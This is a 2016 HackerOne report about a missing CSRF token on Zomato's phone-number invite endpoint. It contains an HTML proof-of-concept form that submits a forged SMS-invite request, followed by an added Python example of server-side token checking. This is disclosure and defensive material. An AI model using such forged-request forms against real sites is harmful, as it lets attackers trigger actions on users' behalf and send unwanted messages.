Zomato: CSRF AT INVITING PEOPLE THROUGH PHONE NUMBER

2016-02-01T14:07:30
ID H1:113865
Type hackerone
Reporter kiraak-boy
Modified 2016-09-14T15:10:19

Description

Hello,

Please Add A CSRF Token While Inviting The User Through Phone Number. You Have Good Rate Limit Protection, But At The Same Time Add A CSRF TOKEN :-

CODE :-

<html>
  <body>
    <!-- PoC form: no anti-CSRF token is sent, and without a method attribute it submits via GET -->
    <form action="https://www.zomato.com/php/restaurantSmsHandler">
      <input type="hidden" name="type" value="zomato-app-details" />
      <input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Thanks!
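The fix the report asks for, shown as an added example that is not part of the report or of Zomato's code: a hypothetical server-side guard for the SMS-invite endpoint that embeds a per-session token in the form and refuses requests that lack it. Session storage, the `csrf_token` field name and the mobile-number check are assumptions for the example.

```python
import hmac
import secrets

# Hypothetical handler (added example, not Zomato's code). The session dict
# stands in for real server-side session storage.
TOKEN_FIELD = "csrf_token"


def issue_token(session: dict) -> str:
    """Create (or reuse) the per-session anti-CSRF token embedded in the form."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def render_invite_form(session: dict, action: str) -> str:
    """Hardened form: POST only, and carries the session-bound token."""
    token = issue_token(session)
    return (
        f'<form method="POST" action="{action}">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{token}" />'
        '<input type="hidden" name="type" value="zomato-app-details" />'
        '<input type="text" name="mobile_no" />'
        '<input type="submit" value="Send invite" />'
        '</form>'
    )


def handle_sms_invite(session: dict, method: str, form: dict) -> tuple:
    """Return (status, message); reject anything a cross-site form could produce."""
    if method != "POST":
        return 405, "state-changing endpoint must not accept GET"
    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD, "")
    # Constant-time compare; a missing session token fails closed.
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    mobile = form.get("mobile_no", "")
    if not mobile.isdigit() or not 8 <= len(mobile) <= 15:
        return 400, "invalid mobile number"
    # Rate limiting (already in place per the report) still applies before the SMS is sent.
    return 200, f"invite queued for {mobile}"
```

The PoC form above, which sends no token and submits via GET, is rejected at the method check; a forged or missing token fails the constant-time comparison.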